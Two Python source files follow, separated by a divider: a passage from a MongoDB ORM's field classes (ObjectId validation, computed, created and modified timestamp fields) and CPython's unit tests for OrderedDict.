        if (not isinstance(value, ObjectId)
            and not isinstance(value, basestring)
            and not isinstance(value, bytes)
            ):
            self._fail_validation_type(value, ObjectId)
        if isinstance(value, ObjectId):
            return
        # 12 bytes: the raw binary form of an ObjectId
        if len(value) == 12:
            return
        # otherwise it must be the 24-character hex form
        if len(value) != 24:
            self._fail_validation(value, 'hex object ID is the wrong length')

    def wrap(self, value, session=None):
        ''' Validates that ``value`` is an ObjectId (or hex representation
            of one), then returns it, converting strings/bytes to ObjectId '''
        self.validate_wrap(value)
        if isinstance(value, bytes) or isinstance(value, basestring):
            return ObjectId(value)
        return value

    def unwrap(self, value, session=None):
        ''' Validates that ``value`` is an ObjectId, then returns it '''
        self.validate_unwrap(value)
        return value
class ComputedField(Field):
    ''' A computed field is generated based on an object's other values.  It
        will generally be created with the @computed_field decorator, but
        can be passed an arbitrary function.

        The function should take a dict which will contain keys with the names
        of the dependencies mapped to their values.

        The computed value is recalculated every time the field is accessed
        unless the one_time field is set to True.

        Example::

            >>> class SomeDoc(Document):
            ...     @computed_field
            ...     def last_modified(obj):
            ...         return datetime.datetime.utcnow()

        .. warning::
            The computed field interacts in an undefined way with partially
            loaded documents right now. If using this class watch out for
            strange behaviour.
    '''
    valid_modifiers = SCALAR_MODIFIERS
    # Marks this field as auto-generated (set by the framework, not the user).
    auto = True
    def __init__(self,
                 computed_type,
                 fun,
                 one_time=False,
                 deps=None,
                 **kwargs):
        ''' :param fun: the function to compute the value of the computed field
            :param computed_type: the type to use when wrapping the computed field
            :param one_time: if True, compute once and reuse the stored value
            :param deps: the names of fields on the current object which should be \
                passed in to compute the value
        '''
        super(ComputedField, self).__init__(**kwargs)
        self.computed_type = computed_type
        if deps is None:
            deps = set()
        self.deps = set(deps)
        self.fun = fun
        self.one_time = one_time
        self.__cached_value = UNSET
    def schema_json(self):
        ''' Extend the base schema with the computed type's schema, the
            one_time flag, and the dependency list. '''
        super_schema = super(ComputedField, self).schema_json()
        return dict(computed_type=self.computed_type.schema_json(),
                    one_time=self.one_time,
                    deps=list(self.deps), **super_schema)
    def __get__(self, instance, owner):
        ''' Descriptor access: recompute on every read unless this is a
            one-time field whose value has already been set. '''
        # class method
        if instance is None:
            return QueryField(self)
        obj_value = instance._values[self._name]
        if obj_value.set and self.one_time:
            return obj_value.value
        computed_value = self.compute_value(instance)
        if self.one_time:
            # cache the first computed value so later reads reuse it
            self.set_value(instance, computed_value)
        return computed_value
    def __set__(self, instance, value):
        ''' Descriptor write: a one-time field may only be set once. '''
        obj_value = instance._values[self._name]
        if obj_value.set and self.one_time:
            raise BadValueException(self._name, value, 'Cannot set a one-time field once it has been set')
        super(ComputedField, self).__set__(instance, value)
    def set_parent_on_subtypes(self, parent):
        ''' Propagate the parent document to the computed type. '''
        self.computed_type._set_parent(parent)
    def dirty_ops(self, instance):
        ''' Return the update operations for this field.

            With dependencies: if none of them are dirty, no ops are emitted.
            With no dependencies, the field is always recomputed on save
            (falls through to the recompute below). '''
        dirty = False
        for dep in self.deps:
            dep_value = instance._values[dep._name]
            if dep_value.dirty:
                dirty = True
                break
        else:
            # for/else: no dep was dirty; skip the update only if there
            # actually are dependencies to track.
            if len(self.deps) > 0:
                return {}
        # make sure we recompute if this is a recompute-on-save
        value = getattr(instance, self._name)
        return {
            self.on_update : {
                self._name : self.wrap(value)
            }
        }
    def compute_value(self, doc):
        ''' Gather the dependency values from ``doc``, call the computing
            function with them, and validate the result against
            ``computed_type``. '''
        args = {}
        for dep in self.deps:
            args[dep._name] = getattr(doc, dep._name)
        value = self.fun(args)
        try:
            self.computed_type.validate_wrap(value)
        except BadValueException as bve:
            self._fail_validation(value, 'Computed Function return a bad value', cause=bve)
        return value
    def wrap_value(self, value):
        ''' A function used to wrap a value used in a comparison.  It will
            first try to wrap as the sequence's sub-type, and then as the
            sequence itself'''
        return self.computed_type.wrap_value(value)
    def validate_wrap(self, value):
        ''' Check that ``value`` is valid for unwrapping with ``ComputedField.computed_type``'''
        try:
            self.computed_type.validate_wrap(value)
        except BadValueException as bve:
            self._fail_validation(value, 'Bad value for computed field', cause=bve)
    def validate_unwrap(self, value):
        ''' Check that ``value`` is valid for unwrapping with ``ComputedField.computed_type``'''
        try:
            self.computed_type.validate_unwrap(value)
        except BadValueException as bve:
            self._fail_validation(value, 'Bad value for computed field', cause=bve)
    def wrap(self, value):
        ''' Validates ``value`` and wraps it with ``ComputedField.computed_type``'''
        self.validate_wrap(value)
        return self.computed_type.wrap(value)
    def unwrap(self, value, session=None):
        ''' Validates ``value`` and unwraps it with ``ComputedField.computed_type``'''
        self.validate_unwrap(value)
        return self.computed_type.unwrap(value, session=session)
class computed_field(object):
    ''' Decorator factory that turns a plain function into a
        :class:`ComputedField`.

        Use as ``@computed_field(SomeFieldType(), deps=[...])`` above the
        function that computes the value. '''
    def __init__(self, computed_type, deps=None, **kwargs):
        # Stash the arguments; they are forwarded to ComputedField in __call__.
        self.computed_type = computed_type
        self.deps = deps
        self.kwargs = kwargs
    def __call__(self, fun):
        ''' Wrap ``fun`` in a ComputedField configured with the stored args. '''
        return ComputedField(self.computed_type, fun, deps=self.deps, **self.kwargs)
def CreatedField(name='created', tz_aware=False, **kwargs):
    ''' A shortcut field for creation time.  It sets the current date and time
        when it enters the database and then doesn't update on further saves.

        If you've used the Django ORM, this is the equivalent of auto_now_add

        :param name: the attribute name given to the generated field
        :param tz_aware: If this is True, the value will be returned in the
            local time of the session. It is always saved in UTC
    '''
    # one_time=True makes the computed value stick after the first save.
    @computed_field(DateTimeField(), one_time=True, **kwargs)
    def created(obj):
        if tz_aware:
            import pytz
            return pytz.utc.localize(datetime.utcnow())
        return datetime.utcnow()
    # expose the field under the caller-chosen attribute name
    created.__name__ = name
    return created
class ModifiedField(DateTimeField):
    ''' A shortcut field for modified time.  It sets the current date and time
        when it enters the database and then updates when the document is
        saved or updated

        If you've used the Django ORM, this is the equivalent of auto_now

        **WARNINGS**: When this field's parent object is sent to the database
        its modified time is set. The local copy is not updated for technical
        reasons. Hopefully this will not be the case in the future.

        :param tz_aware: If this is True, the value will be returned in the
            local time of the session. It is always saved in UTC
    '''
    def __init__(self, tz_aware=False, **kwargs):
        if 'use_tz' not in kwargs:
            kwargs['use_tz'] = tz_aware
        # default is "now" at the moment the default is requested, not at
        # field-definition time
        kwargs['default_f'] = lambda: self.__value()
        super(ModifiedField, self).__init__(**kwargs)
    def __value(self):
        # Current time, tz-aware (UTC) when use_tz is set, else naive UTC.
        if self.use_tz:
            import pytz
            return pytz.utc.localize(datetime.utcnow())
        return datetime.utcnow()
    def wrap(self, obj):
        # Wrapping for the database always stamps a fresh "now"; the passed
        # value is intentionally ignored (auto_now semantics).
        value = self.__value()
        return value
    def __get__(self, instance, owner):
        ''' Descriptor read: return the stored value if set, otherwise stamp
            and store the current time. '''
        # class method
        if instance is None:
            return QueryField(self)
        obj_value = instance._values[self._name]
        if obj_value.set:
            return obj_value.value
        value = self.__value()
        self.set_value(instance, value)
        return value
| |
import builtins
import contextlib
import copy
import gc
import pickle
from random import randrange, shuffle
import struct
import sys
import unittest
import weakref
from collections.abc import MutableMapping
from test import mapping_tests, support
# Import both implementations under test: the pure-Python collections module
# (with the C accelerator blocked) and the C-accelerated one (None when the
# _collections extension is unavailable).
py_coll = support.import_fresh_module('collections', blocked=['_collections'])
c_coll = support.import_fresh_module('collections', fresh=['_collections'])
@contextlib.contextmanager
def replaced_module(name, replacement):
    """Temporarily install *replacement* as ``sys.modules[name]``.

    The original module is restored when the with-block exits, even if the
    body raises.  Used because pickling looks classes up by module name.
    """
    saved = sys.modules[name]
    sys.modules[name] = replacement
    try:
        yield
    finally:
        sys.modules[name] = saved
class OrderedDictTests:
    """Behavioural test mixin for an OrderedDict implementation.

    Concrete subclasses supply ``OrderedDict`` (the class under test) and
    ``module`` (the module it came from; pickling resolves classes by module
    name, hence the replaced_module() shim in the pickle tests).
    """
    def test_init(self):
        OrderedDict = self.OrderedDict
        with self.assertRaises(TypeError):
            OrderedDict([('a', 1), ('b', 2)], None)                                 # too many args
        pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
        self.assertEqual(sorted(OrderedDict(dict(pairs)).items()), pairs)           # dict input
        self.assertEqual(sorted(OrderedDict(**dict(pairs)).items()), pairs)         # kwds input
        self.assertEqual(list(OrderedDict(pairs).items()), pairs)                   # pairs input
        self.assertEqual(list(OrderedDict([('a', 1), ('b', 2), ('c', 9), ('d', 4)],
                                          c=3, e=5).items()), pairs)                # mixed input
        # make sure no positional args conflict with possible kwdargs
        self.assertEqual(list(OrderedDict(self=42).items()), [('self', 42)])
        self.assertEqual(list(OrderedDict(other=42).items()), [('other', 42)])
        self.assertRaises(TypeError, OrderedDict, 42)
        self.assertRaises(TypeError, OrderedDict, (), ())
        self.assertRaises(TypeError, OrderedDict.__init__)
        # Make sure that direct calls to __init__ do not clear previous contents
        d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
        d.__init__([('e', 5), ('f', 6)], g=7, d=4)
        self.assertEqual(list(d.items()),
            [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
    def test_update(self):
        OrderedDict = self.OrderedDict
        with self.assertRaises(TypeError):
            OrderedDict().update([('a', 1), ('b', 2)], None)                        # too many args
        pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
        od = OrderedDict()
        od.update(dict(pairs))
        self.assertEqual(sorted(od.items()), pairs)                                 # dict input
        od = OrderedDict()
        od.update(**dict(pairs))
        self.assertEqual(sorted(od.items()), pairs)                                 # kwds input
        od = OrderedDict()
        od.update(pairs)
        self.assertEqual(list(od.items()), pairs)                                   # pairs input
        od = OrderedDict()
        od.update([('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5)
        self.assertEqual(list(od.items()), pairs)                                   # mixed input
        # Issue 9137: Named argument called 'other' or 'self'
        # shouldn't be treated specially.
        od = OrderedDict()
        od.update(self=23)
        self.assertEqual(list(od.items()), [('self', 23)])
        od = OrderedDict()
        od.update(other={})
        self.assertEqual(list(od.items()), [('other', {})])
        od = OrderedDict()
        od.update(red=5, blue=6, other=7, self=8)
        self.assertEqual(sorted(list(od.items())),
                         [('blue', 6), ('other', 7), ('red', 5), ('self', 8)])
        # Make sure that direct calls to update do not clear previous contents
        # and that updated items are not moved to the end
        d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
        d.update([('e', 5), ('f', 6)], g=7, d=4)
        self.assertEqual(list(d.items()),
            [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
        self.assertRaises(TypeError, OrderedDict().update, 42)
        self.assertRaises(TypeError, OrderedDict().update, (), ())
        self.assertRaises(TypeError, OrderedDict.update)
        self.assertRaises(TypeError, OrderedDict().update, 42)
        self.assertRaises(TypeError, OrderedDict().update, (), ())
        self.assertRaises(TypeError, OrderedDict.update)
    def test_init_calls(self):
        # update() must prefer keys() over items() on mapping-like arguments
        calls = []
        class Spam:
            def keys(self):
                calls.append('keys')
                return ()
            def items(self):
                calls.append('items')
                return ()
        self.OrderedDict(Spam())
        self.assertEqual(calls, ['keys'])
    def test_fromkeys(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict.fromkeys('abc')
        self.assertEqual(list(od.items()), [(c, None) for c in 'abc'])
        od = OrderedDict.fromkeys('abc', value=None)
        self.assertEqual(list(od.items()), [(c, None) for c in 'abc'])
        od = OrderedDict.fromkeys('abc', value=0)
        self.assertEqual(list(od.items()), [(c, 0) for c in 'abc'])
    def test_abc(self):
        OrderedDict = self.OrderedDict
        self.assertIsInstance(OrderedDict(), MutableMapping)
        self.assertTrue(issubclass(OrderedDict, MutableMapping))
    def test_clear(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od = OrderedDict(pairs)
        self.assertEqual(len(od), len(pairs))
        od.clear()
        self.assertEqual(len(od), 0)
    def test_delitem(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        od = OrderedDict(pairs)
        del od['a']
        self.assertNotIn('a', od)
        with self.assertRaises(KeyError):
            del od['a']
        self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])
    def test_setitem(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict([('d', 1), ('b', 2), ('c', 3), ('a', 4), ('e', 5)])
        od['c'] = 10           # existing element
        od['f'] = 20           # new element
        self.assertEqual(list(od.items()),
                         [('d', 1), ('b', 2), ('c', 10), ('a', 4), ('e', 5), ('f', 20)])
    def test_iterators(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od = OrderedDict(pairs)
        self.assertEqual(list(od), [t[0] for t in pairs])
        self.assertEqual(list(od.keys()), [t[0] for t in pairs])
        self.assertEqual(list(od.values()), [t[1] for t in pairs])
        self.assertEqual(list(od.items()), pairs)
        self.assertEqual(list(reversed(od)),
                         [t[0] for t in reversed(pairs)])
        self.assertEqual(list(reversed(od.keys())),
                         [t[0] for t in reversed(pairs)])
        self.assertEqual(list(reversed(od.values())),
                         [t[1] for t in reversed(pairs)])
        self.assertEqual(list(reversed(od.items())), list(reversed(pairs)))
    def test_detect_deletion_during_iteration(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict.fromkeys('abc')
        it = iter(od)
        key = next(it)
        del od[key]
        with self.assertRaises(Exception):
            # Note, the exact exception raised is not guaranteed
            # The only guarantee that the next() will not succeed
            next(it)
    def test_sorted_iterators(self):
        OrderedDict = self.OrderedDict
        with self.assertRaises(TypeError):
            OrderedDict([('a', 1), ('b', 2)], None)
        pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
        od = OrderedDict(pairs)
        self.assertEqual(sorted(od), [t[0] for t in pairs])
        self.assertEqual(sorted(od.keys()), [t[0] for t in pairs])
        self.assertEqual(sorted(od.values()), [t[1] for t in pairs])
        self.assertEqual(sorted(od.items()), pairs)
        self.assertEqual(sorted(reversed(od)),
                         sorted([t[0] for t in reversed(pairs)]))
    def test_iterators_empty(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        empty = []
        self.assertEqual(list(od), empty)
        self.assertEqual(list(od.keys()), empty)
        self.assertEqual(list(od.values()), empty)
        self.assertEqual(list(od.items()), empty)
        self.assertEqual(list(reversed(od)), empty)
        self.assertEqual(list(reversed(od.keys())), empty)
        self.assertEqual(list(reversed(od.values())), empty)
        self.assertEqual(list(reversed(od.items())), empty)
    def test_popitem(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od = OrderedDict(pairs)
        while pairs:
            self.assertEqual(od.popitem(), pairs.pop())
        with self.assertRaises(KeyError):
            od.popitem()
        self.assertEqual(len(od), 0)
    def test_popitem_last(self):
        OrderedDict = self.OrderedDict
        pairs = [(i, i) for i in range(30)]
        obj = OrderedDict(pairs)
        for i in range(8):
            obj.popitem(True)
        obj.popitem(True)
        obj.popitem(last=True)
        self.assertEqual(len(obj), 20)
    def test_pop(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od = OrderedDict(pairs)
        shuffle(pairs)
        while pairs:
            k, v = pairs.pop()
            self.assertEqual(od.pop(k), v)
        with self.assertRaises(KeyError):
            od.pop('xyz')
        self.assertEqual(len(od), 0)
        self.assertEqual(od.pop(k, 12345), 12345)
        # make sure pop still works when __missing__ is defined
        class Missing(OrderedDict):
            def __missing__(self, key):
                return 0
        m = Missing(a=1)
        self.assertEqual(m.pop('b', 5), 5)
        self.assertEqual(m.pop('a', 6), 1)
        self.assertEqual(m.pop('a', 6), 6)
        self.assertEqual(m.pop('a', default=6), 6)
        with self.assertRaises(KeyError):
            m.pop('a')
    def test_equality(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od1 = OrderedDict(pairs)
        od2 = OrderedDict(pairs)
        self.assertEqual(od1, od2)          # same order implies equality
        pairs = pairs[2:] + pairs[:2]
        od2 = OrderedDict(pairs)
        self.assertNotEqual(od1, od2)       # different order implies inequality
        # comparison to regular dict is not order sensitive
        self.assertEqual(od1, dict(od2))
        self.assertEqual(dict(od2), od1)
        # different length implied inequality
        self.assertNotEqual(od1, OrderedDict(pairs[:-1]))
    def test_copying(self):
        OrderedDict = self.OrderedDict
        # Check that ordered dicts are copyable, deepcopyable, picklable,
        # and have a repr/eval round-trip
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        od = OrderedDict(pairs)
        def check(dup):
            msg = "\ncopy: %s\nod: %s" % (dup, od)
            self.assertIsNot(dup, od, msg)
            self.assertEqual(dup, od)
            self.assertEqual(list(dup.items()), list(od.items()))
            self.assertEqual(len(dup), len(od))
            self.assertEqual(type(dup), type(od))
        check(od.copy())
        check(copy.copy(od))
        check(copy.deepcopy(od))
        # pickle directly pulls the module, so we have to fake it
        with replaced_module('collections', self.module):
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.subTest(proto=proto):
                    check(pickle.loads(pickle.dumps(od, proto)))
        check(eval(repr(od)))
        update_test = OrderedDict()
        update_test.update(od)
        check(update_test)
        check(OrderedDict(od))
    def test_yaml_linkage(self):
        OrderedDict = self.OrderedDict
        # Verify that __reduce__ is setup in a way that supports PyYAML's dump() feature.
        # In yaml, lists are native but tuples are not.
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        od = OrderedDict(pairs)
        # yaml.dump(od) -->
        # '!!python/object/apply:__main__.OrderedDict\n- - [a, 1]\n  - [b, 2]\n'
        self.assertTrue(all(type(pair)==list for pair in od.__reduce__()[1]))
    def test_reduce_not_too_fat(self):
        OrderedDict = self.OrderedDict
        # do not save instance dictionary if not needed
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        od = OrderedDict(pairs)
        self.assertIsInstance(od.__dict__, dict)
        self.assertIsNone(od.__reduce__()[2])
        od.x = 10
        self.assertEqual(od.__dict__['x'], 10)
        self.assertEqual(od.__reduce__()[2], {'x': 10})
    def test_pickle_recursive(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        od[1] = od
        # pickle directly pulls the module, so we have to fake it
        with replaced_module('collections', self.module):
            for proto in range(-1, pickle.HIGHEST_PROTOCOL + 1):
                dup = pickle.loads(pickle.dumps(od, proto))
                self.assertIsNot(dup, od)
                self.assertEqual(list(dup.keys()), [1])
                self.assertIs(dup[1], dup)
    def test_repr(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])
        self.assertEqual(repr(od),
            "OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])")
        self.assertEqual(eval(repr(od)), od)
        self.assertEqual(repr(OrderedDict()), "OrderedDict()")
    def test_repr_recursive(self):
        OrderedDict = self.OrderedDict
        # See issue #9826
        od = OrderedDict.fromkeys('abc')
        od['x'] = od
        self.assertEqual(repr(od),
            "OrderedDict([('a', None), ('b', None), ('c', None), ('x', ...)])")
    def test_setdefault(self):
        OrderedDict = self.OrderedDict
        pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
        shuffle(pairs)
        od = OrderedDict(pairs)
        pair_order = list(od.items())
        self.assertEqual(od.setdefault('a', 10), 3)
        # make sure order didn't change
        self.assertEqual(list(od.items()), pair_order)
        self.assertEqual(od.setdefault('x', 10), 10)
        # make sure 'x' is added to the end
        self.assertEqual(list(od.items())[-1], ('x', 10))
        self.assertEqual(od.setdefault('g', default=9), 9)
        # make sure setdefault still works when __missing__ is defined
        class Missing(OrderedDict):
            def __missing__(self, key):
                return 0
        self.assertEqual(Missing().setdefault(5, 9), 9)
    def test_reinsert(self):
        OrderedDict = self.OrderedDict
        # Given insert a, insert b, delete a, re-insert a,
        # verify that a is now later than b.
        od = OrderedDict()
        od['a'] = 1
        od['b'] = 2
        del od['a']
        self.assertEqual(list(od.items()), [('b', 2)])
        od['a'] = 1
        self.assertEqual(list(od.items()), [('b', 2), ('a', 1)])
    def test_move_to_end(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict.fromkeys('abcde')
        self.assertEqual(list(od), list('abcde'))
        od.move_to_end('c')
        self.assertEqual(list(od), list('abdec'))
        od.move_to_end('c', 0)
        self.assertEqual(list(od), list('cabde'))
        od.move_to_end('c', 0)
        self.assertEqual(list(od), list('cabde'))
        od.move_to_end('e')
        self.assertEqual(list(od), list('cabde'))
        od.move_to_end('b', last=False)
        self.assertEqual(list(od), list('bcade'))
        with self.assertRaises(KeyError):
            od.move_to_end('x')
        with self.assertRaises(KeyError):
            od.move_to_end('x', 0)
    def test_move_to_end_issue25406(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict.fromkeys('abc')
        od.move_to_end('c', last=False)
        self.assertEqual(list(od), list('cab'))
        od.move_to_end('a', last=False)
        self.assertEqual(list(od), list('acb'))
        od = OrderedDict.fromkeys('abc')
        od.move_to_end('a')
        self.assertEqual(list(od), list('bca'))
        od.move_to_end('c')
        self.assertEqual(list(od), list('bac'))
    def test_sizeof(self):
        OrderedDict = self.OrderedDict
        # Wimpy test: Just verify the reported size is larger than a regular dict
        d = dict(a=1)
        od = OrderedDict(**d)
        self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))
    def test_views(self):
        OrderedDict = self.OrderedDict
        # See http://bugs.python.org/issue24286
        s = 'the quick brown fox jumped over a lazy dog yesterday before dawn'.split()
        od = OrderedDict.fromkeys(s)
        self.assertEqual(od.keys(), dict(od).keys())
        self.assertEqual(od.items(), dict(od).items())
    def test_override_update(self):
        OrderedDict = self.OrderedDict
        # Verify that subclasses can override update() without breaking __init__()
        class MyOD(OrderedDict):
            def update(self, *args, **kwds):
                raise Exception()
        items = [('a', 1), ('c', 3), ('b', 2)]
        self.assertEqual(list(MyOD(items).items()), items)
    def test_highly_nested(self):
        # Issue 25395: crashes during garbage collection
        OrderedDict = self.OrderedDict
        obj = None
        for _ in range(1000):
            obj = OrderedDict([(None, obj)])
        del obj
        support.gc_collect()
    def test_highly_nested_subclass(self):
        # Issue 25395: crashes during garbage collection
        OrderedDict = self.OrderedDict
        deleted = []
        class MyOD(OrderedDict):
            def __del__(self):
                deleted.append(self.i)
        obj = None
        for i in range(100):
            obj = MyOD([(None, obj)])
            obj.i = i
        del obj
        support.gc_collect()
        self.assertEqual(deleted, list(reversed(range(100))))
    def test_delitem_hash_collision(self):
        OrderedDict = self.OrderedDict
        class Key:
            def __init__(self, hash):
                self._hash = hash
                self.value = str(id(self))
            def __hash__(self):
                return self._hash
            def __eq__(self, other):
                try:
                    return self.value == other.value
                except AttributeError:
                    return False
            def __repr__(self):
                return self.value
        def blocking_hash(hash):
            # See the collision-handling in lookdict (in Objects/dictobject.c).
            MINSIZE = 8
            i = (hash & MINSIZE-1)
            return (i << 2) + i + hash + 1
        COLLIDING = 1
        key = Key(COLLIDING)
        colliding = Key(COLLIDING)
        blocking = Key(blocking_hash(COLLIDING))
        od = OrderedDict()
        od[key] = ...
        od[blocking] = ...
        od[colliding] = ...
        od['after'] = ...
        del od[blocking]
        del od[colliding]
        self.assertEqual(list(od.items()), [(key, ...), ('after', ...)])
    def test_issue24347(self):
        OrderedDict = self.OrderedDict
        # Unstable hashes must not crash the implementation.
        class Key:
            def __hash__(self):
                return randrange(100000)
        od = OrderedDict()
        for i in range(100):
            key = Key()
            od[key] = i
        # These should not crash.
        with self.assertRaises(KeyError):
            list(od.values())
        with self.assertRaises(KeyError):
            list(od.items())
        with self.assertRaises(KeyError):
            repr(od)
        with self.assertRaises(KeyError):
            od.copy()
    def test_issue24348(self):
        OrderedDict = self.OrderedDict
        class Key:
            def __hash__(self):
                return 1
        od = OrderedDict()
        od[Key()] = 0
        # This should not crash.
        od.popitem()
    def test_issue24667(self):
        """
        dict resizes after a certain number of insertion operations,
        whether or not there were deletions that freed up slots in the
        hash table.  During fast node lookup, OrderedDict must correctly
        respond to all resizes, even if the current "size" is the same
        as the old one.  We verify that here by forcing a dict resize
        on a sparse odict and then perform an operation that should
        trigger an odict resize (e.g. popitem).  One key aspect here is
        that we will keep the size of the odict the same at each popitem
        call.  This verifies that we handled the dict resize properly.
        """
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        for c0 in '0123456789ABCDEF':
            for c1 in '0123456789ABCDEF':
                if len(od) == 4:
                    # This should not raise a KeyError.
                    od.popitem(last=False)
                key = c0 + c1
                od[key] = key
    # Direct use of dict methods
    def test_dict_setitem(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        dict.__setitem__(od, 'spam', 1)
        self.assertNotIn('NULL', repr(od))
    def test_dict_delitem(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        od['spam'] = 1
        od['ham'] = 2
        dict.__delitem__(od, 'spam')
        with self.assertRaises(KeyError):
            repr(od)
    def test_dict_clear(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        od['spam'] = 1
        od['ham'] = 2
        dict.clear(od)
        self.assertNotIn('NULL', repr(od))
    def test_dict_pop(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        od['spam'] = 1
        od['ham'] = 2
        dict.pop(od, 'spam')
        with self.assertRaises(KeyError):
            repr(od)
    def test_dict_popitem(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        od['spam'] = 1
        od['ham'] = 2
        dict.popitem(od)
        with self.assertRaises(KeyError):
            repr(od)
    def test_dict_setdefault(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        dict.setdefault(od, 'spam', 1)
        self.assertNotIn('NULL', repr(od))
    def test_dict_update(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict()
        dict.update(od, [('spam', 1)])
        self.assertNotIn('NULL', repr(od))
    def test_reference_loop(self):
        # Issue 25935
        OrderedDict = self.OrderedDict
        class A:
            od = OrderedDict()
        A.od[A] = None
        r = weakref.ref(A)
        del A
        gc.collect()
        self.assertIsNone(r())
    def test_free_after_iterating(self):
        support.check_free_after_iterating(self, iter, self.OrderedDict)
        support.check_free_after_iterating(self, lambda d: iter(d.keys()), self.OrderedDict)
        support.check_free_after_iterating(self, lambda d: iter(d.values()), self.OrderedDict)
        support.check_free_after_iterating(self, lambda d: iter(d.items()), self.OrderedDict)
class PurePythonOrderedDictTests(OrderedDictTests, unittest.TestCase):
    # Run the shared tests against the pure-Python implementation.
    module = py_coll
    OrderedDict = py_coll.OrderedDict
class CPythonBuiltinDictTests(unittest.TestCase):
    """Builtin dict preserves insertion order.
    Reuse some of tests in OrderedDict selectively.
    """
    module = builtins
    OrderedDict = dict

# Copy only the order-related tests onto the builtin-dict test case; the
# remaining OrderedDictTests rely on OrderedDict-only API (move_to_end, etc.).
for method in (
    "test_init test_update test_abc test_clear test_delitem " +
    "test_setitem test_detect_deletion_during_iteration " +
    "test_popitem test_reinsert test_override_update " +
    "test_highly_nested test_highly_nested_subclass " +
    "test_delitem_hash_collision ").split():
    setattr(CPythonBuiltinDictTests, method, getattr(OrderedDictTests, method))
del method
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonOrderedDictTests(OrderedDictTests, unittest.TestCase):
    # Run the shared tests against the C-accelerated implementation, plus
    # some CPython-only checks (exact sizeof, mutation-during-iteration).
    module = c_coll
    OrderedDict = c_coll.OrderedDict
    check_sizeof = support.check_sizeof
    @support.cpython_only
    def test_sizeof_exact(self):
        OrderedDict = self.OrderedDict
        calcsize = struct.calcsize
        size = support.calcobjsize
        check = self.check_sizeof
        basicsize = size('nQ2P' + '3PnPn2P') + calcsize('2nP2n')
        entrysize = calcsize('n2P')
        p = calcsize('P')
        nodesize = calcsize('Pn2P')
        od = OrderedDict()
        check(od, basicsize + 8*p + 8 + 5*entrysize)  # 8byte indices + 8*2//3 * entry table
        od.x = 1
        check(od, basicsize + 8*p + 8 + 5*entrysize)
        od.update([(i, i) for i in range(3)])
        check(od, basicsize + 8*p + 8 + 5*entrysize + 3*nodesize)
        od.update([(i, i) for i in range(3, 10)])
        check(od, basicsize + 16*p + 16 + 10*entrysize + 10*nodesize)
        check(od.keys(), size('P'))
        check(od.items(), size('P'))
        check(od.values(), size('P'))
        itersize = size('iP2n2P')
        check(iter(od), itersize)
        check(iter(od.keys()), itersize)
        check(iter(od.items()), itersize)
        check(iter(od.values()), itersize)
    def test_key_change_during_iteration(self):
        OrderedDict = self.OrderedDict
        od = OrderedDict.fromkeys('abcde')
        self.assertEqual(list(od), list('abcde'))
        with self.assertRaises(RuntimeError):
            for i, k in enumerate(od):
                od.move_to_end(k)
            self.assertLess(i, 5)
        with self.assertRaises(RuntimeError):
            for k in od:
                od['f'] = None
        with self.assertRaises(RuntimeError):
            for k in od:
                del od['c']
        self.assertEqual(list(od), list('bdeaf'))
class PurePythonOrderedDictSubclassTests(PurePythonOrderedDictTests):
    # Re-run the pure-Python suite against a trivial subclass.
    module = py_coll
    class OrderedDict(py_coll.OrderedDict):
        pass
class CPythonOrderedDictSubclassTests(CPythonOrderedDictTests):
    # Re-run the C suite against a trivial subclass.
    module = c_coll
    class OrderedDict(c_coll.OrderedDict):
        pass
